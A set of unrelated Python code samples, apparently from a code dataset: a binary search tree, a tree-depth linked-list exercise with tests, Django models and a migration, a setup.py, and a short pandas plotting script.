self.left.printTree()
print(self.data)
if self.right:
self.right.printTree()
# insert a new node
def insert(self, data):
# Cоmpаrе thе nеw vаluе with thе pаrеnt nоdе
if self.data:
# if less than parent pick left
if data < self.data:
if self.left is None:
self.left = Node(data)
else:
self.left.insert(data)
# if greater than parent pick right
elif data > self.data:
if self.right is None:
self.right = Node(data)
else:
self.right.insert(data)
else:
self.data = data
# findval method to compare the value with nodes
def findval(self, lkpval):
if lkpval < self.data:
if self.left is None:
return str(lkpval)+" is not Found"
return self.left.findval(lkpval)
elif lkpval > self.data:
if self.right is None:
return str(lkpval)+" is not Found"
return self.right.findval(lkpval)
else:
return str(self.data) + " is found"
if __name__ =='__main__':
# result 10 14 19 27 31 35
root = Node(27)
root.insert(14)
root.insert(35)
root.insert(31)
root.insert(10)
root.insert(19)
root.printTree()
print(root.findval(7))
print(root.findval(14))
|
def list_of_depths(tree):
if not tree:
return []
lists = []
queue = Queue()
current_depth = -1
current_tail = None
node = tree
node.depth = 0
while node:
if node.depth == current_depth:
current_tail.next = ListNode(node.data)
current_tail = current_tail.next
else:
current_depth = node.depth
current_tail = ListNode(node.data)
lists.append(current_tail)
for child in [node.left, node.right]:
if child:
child.depth = node.depth + 1
queue.add(child)
node = queue.remove()
return lists
class TreeNode():
def __init__(self, data=None, left=None, right=None):
self.data, self.left, self.right = data, left, right
self.depth = None
class ListNode():
def __init__(self, data=None, next=None):
self.data, self.next = data, next
def __str__(self):
return str(self.data) + ',' + str(self.next)
class Queue():
def __init__(self):
self.head, self.tail = None, None
def add(self, item):
if self.head:
self.tail.next = ListNode(item)
self.tail = self.tail.next
else:
self.head = self.tail = ListNode(item)
def remove(self):
if not self.head:
return None
item = self.head.data
self.head = self.head.next
return item
import unittest
class Test(unittest.TestCase):
def test_list_of_depths(self):
node_h = TreeNode('H')
node_g = TreeNode('G')
node_f = TreeNode('F')
node_e = TreeNode('E', node_g)
node_d = TreeNode('D', node_h)
node_c = TreeNode('C', None, node_f)
node_b = TreeNode('B', node_d, node_e)
node_a = TreeNode('A', node_b, node_c)
lists = list_of_depths(node_a)
self.assertEqual(str(lists[0]), "A,None")
self.assertEqual(str(lists[1]), "B,C,None")
self.assertEqual(str(lists[2]), "D,E,F,None")
self.assertEqual(str(lists[3]), "H,G,None")
self.assertEqual(len(lists), 4)
if __name__ == "__main__":
unittest.main()
|
from distutils.version import LooseVersion
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.contrib.auth.models import Permission
class TruncatingCharField(models.CharField):
def get_prep_value(self, value):
value = super(TruncatingCharField,self).get_prep_value(value)
if value:
return value[:self.max_length]
return value
class Application(models.Model):
appPermissionCode = 'can_view_application_'
name = models.CharField(max_length=50)
def get_linked_applications(self):
linked_applications = []
if self.linkedApplication and self.linkedApplication.id != self.id:
linked_applications.append(self.linkedApplication)
linked_applications += self.linkedApplication.get_linked_applications()
return linked_applications
linkedApplication = models.ManyToManyField("self", related_name='linked_application', symmetrical=False)
linkedApplication.short_description = 'linked application'
def __str__(self):
return self.name
def save(self, *args, **kwargs):
super(Application, self).save(*args, **kwargs)
content_type = ContentType.objects.get_for_model(Application)
Permission.objects.get_or_create(
codename=Application.appPermissionCode + self.name,
name='Can view application and related variables and versions for ' + self.name,
content_type=content_type,
)
def delete(self, *args, **kwargs):
super(Application, self).delete(*args, **kwargs)
Permission.objects.get(codename=Application.appPermissionCode + self.name).delete()
class Version(models.Model):
application = models.ForeignKey(Application, related_name='version', on_delete=models.CASCADE)
name = models.CharField(max_length=50)
def __str__(self):
return self.application.name + '-' + self.name
def previousVersions(self):
"""
Get all versions for the same application, previous to this one
"""
versions = [v for v in Version.objects.filter(application=self.application) if LooseVersion(v.name) < LooseVersion(self.name)]
versions.sort(key=lambda v: LooseVersion(v.name), reverse=False)
return versions
def nextVersions(self):
"""
Get all versions for the same application, previous to this one
"""
versions = [v for v in Version.objects.filter(application=self.application) if LooseVersion(v.name) >= LooseVersion(self.name)]
versions.sort(key=lambda v: LooseVersion(v.name), reverse=False)
return versions
class TestEnvironment(models.Model):
"""
An environment can be linked to an other one
For example, NonReg1 is a NonReg environment from which it will get all variables
"""
__test__= False # avoid detecting it as a test class
name = models.CharField(max_length=20)
def __str__(self):
return self.name
def get_parent_environments(self):
parent_environments = []
if self.genericEnvironment and self.genericEnvironment.id != self.id:
parent_environments.append(self.genericEnvironment)
parent_environments += self.genericEnvironment.get_parent_environments()
return parent_environments
genericEnvironment = models.ForeignKey('self', null=True, on_delete=models.CASCADE)
genericEnvironment.short_description = 'generic environnement'
class TestCase(models.Model):
__test__= False # avoid detecting it as a test class
name = models.CharField(max_length=150)
application = models.ForeignKey(Application, related_name='testCase', on_delete=models.CASCADE)
def __str__(self):
return "%s - %s" % (self.name, self.application.name) |
"""Setup module"""
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open # pylint:disable=W0622
from os.path import abspath, dirname, join
README = join(abspath(dirname(__file__)), 'README.md')
try:
import pypandoc
DESCRIPTION = pypandoc.convert(README, 'rst')
except(IOError, ImportError):
# Get the long description from the README file
with open(README, encoding='utf-8') as fptr:
DESCRIPTION = fptr.read()
setup(
name='SimpleInterceptor',
version='0.1',
description='Simple interceptor related to concepts of AOP',
long_description=DESCRIPTION,
url='https://github.com/host-anshu/simpleInterceptor',
author='Anshu Choubey',
author_email='anshu.choubey@imaginea.com',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
keywords='python interceptor aop call graph tree',
packages=find_packages(),
py_modules=['interceptor'],
install_requires=['ansible>=2.0'],
entry_points={
'console_scripts': [
'interceptor=interceptor:intercept',
],
},
test_suite="test"
)
|
#!/bin/env python
#
import pandas as pd
import pandas.io.data as web
from qrzigzag import peak_valley_pivots, max_drawdown, compute_segment_returns, pivots_to_modes
X = web.get_data_yahoo('GOOG')['Adj Close']
pivots = peak_valley_pivots(X, 0.2, -0.2)
ts_pivots = pd.Series(X, index=X.index)
ts_pivots = ts_pivots[pivots != 0]
X.plot()
ts_pivots.plot(style='g-o') |
# Generated by Django 2.2 on 2019-04-26 09:09
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('market', '0071_auto_20190426_0925'),
]
operations = [
migrations.CreateModel(
name='FBidder',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('bid_amount', models.CharField(max_length=255, validators=[django.core.validators.RegexValidator('^[0-9]*$', 'Only numeric are allowed.')])),
('bid_status', models.CharField(choices=[('PENDING', '0'), ('WINNER', '1')], default='PENDING', max_length=20)),
('product_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='market.Product')),
('user_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='Bid',
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.